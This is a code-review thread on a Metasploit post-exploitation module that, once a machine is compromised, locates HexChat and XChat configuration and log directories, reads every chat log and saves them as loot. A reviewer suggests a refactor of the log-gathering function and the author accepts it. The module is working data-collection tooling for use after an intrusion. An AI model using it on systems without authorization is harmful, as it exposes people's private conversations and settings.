modules/post/multi/gather/enum_hexchat.rb

```diff
@@ -0,0 +1,267 @@
+      OptBool.new('XCHAT', [false, 'Enumerate xchat', false ])
+    ])
+  end
+
+  def whoami
+    cmd_exec('/usr/bin/whoami').chomp
+  end
+
+  def sep
+    if session.platform == 'windows'
+      return '\\'
+    else
+      return '/'
+    end
+  end
+
+  def get_paths(mode = 'HEXCHAT')
+    paths = []
+    if session.platform == 'windows'
+      appdata = get_env('APPDATA')
+      if mode == 'HEXCHAT'
+        paths << "#{appdata}\\HexChat\\"
+      elsif datastore['XCHAT']
+        paths << "#{appdata}\\X-Chat 2\\"
+      end
+    else
+      user = whoami
+      fail_with(Failure::Unknown, 'Unable to get username.') if user.blank?
+      vprint_status("Detcted username: #{user}")
+
+      if mode == 'HEXCHAT'
+        # https://hexchat.readthedocs.io/en/latest/settings.html
+        paths << "/home/#{user}/.config/hexchat/"
+      elsif mode == 'XCHAT'
+        paths << "/home/#{user}/.xchat2/"
+      end
+    end
+    paths
+  end
+
+  def list_logs(base, mode = 'HEXCHAT')
+    files = []
+    if mode == 'HEXCHAT'
+      # hexchat has a folder for each server
+      # inside each folder, like 'freenode'
+      # are files: sever.log, <server>.log, .log
+      folders = dir base
+      folders.each do |folder|
+        file = dir "#{base}#{sep}#{folder}"
+        file.each do |f|
+          if f.end_with? '.log'
+            files << "#{base}#{sep}#{folder}#{sep}#{f}"
+          end
+        end
+      end
+    elsif mode == 'XCHAT'
+      file = dir base
+      file.each do |f|
+        if f.end_with? '.log'
+          files << "#{base}#{sep}#{f}"
+        end
+      end
+    end
+    files
+  end
+
+  def save(type, data, mode = 'HEXCHAT')
+    case type
+    when :configs
+      type = "#{mode.downcase}.config"
+    when :chatlogs
+      type = "#{mode.downcase}.chatlogs"
+    end
+
+    data.each do |d|
+      fname = ::File.basename(d[:filename])
+      p = store_loot(
+        type,
+        'text/plain',
+        session,
+        d[:data],
+        fname
+      )
+      print_good("#{fname} saved as #{p}")
+    end
+  end
+
+  def get_chatlogs(base, mode = 'HEXCHAT')
+    logs = []
+    if mode == 'XCHAT'
+      base_logs = "#{base}#{sep}xchatlogs"
+      unless directory? base_logs
+        vprint_error("Chat logs not found at #{base_logs}")
+        return logs
+      end
+
+      list_logs(base_logs, 'XCHAT').each do |l|
+        vprint_status("Downloading: #{l}")
+        data = read_file(l)
+        logs << {
+          filename: l,
+          data: data
+        }
+      end
+    elsif mode == 'HEXCHAT'
+      base_logs = "#{base}#{sep}logs"
+      unless directory? base_logs
+        vprint_error("Chat logs not found at #{base_logs}")
+        return logs
+      end
+
+      list_logs(base_logs).each do |l|
+        vprint_status("Downloading: #{l}")
+        data = read_file(l)
+        logs << {
+          filename: l,
+          data: data
+        }
+      end
+    end
+
+    logs
+  end
```

Comment:
Now that the old code has been removed, this code is unnecessarily duplicated.

```suggestion
  def get_chatlogs(base, mode = 'HEXCHAT')
    logs = []
    
    case mode
    when 'XCHAT'
      base_logs = "#{base}#{sep}xchatlogs"
    when 'HEXCHAT'
      base_logs = "#{base}#{sep}logs"
    else
      vprint_error("Invalid mode: #{mode}")
      return logs
    end

    unless directory? base_logs
      vprint_error("Chat logs not found at #{base_logs}")
      return logs
    end

    list_logs(base_logs, mode).each do |l|
      vprint_status("Downloading: #{l}")
      data = read_file(l)
      logs << {
        filename: l,
        data: data
      }
    end

    logs
  end
```

Bonus: `mode` validation.

Reply:
def is cleaner, thanks for the help on that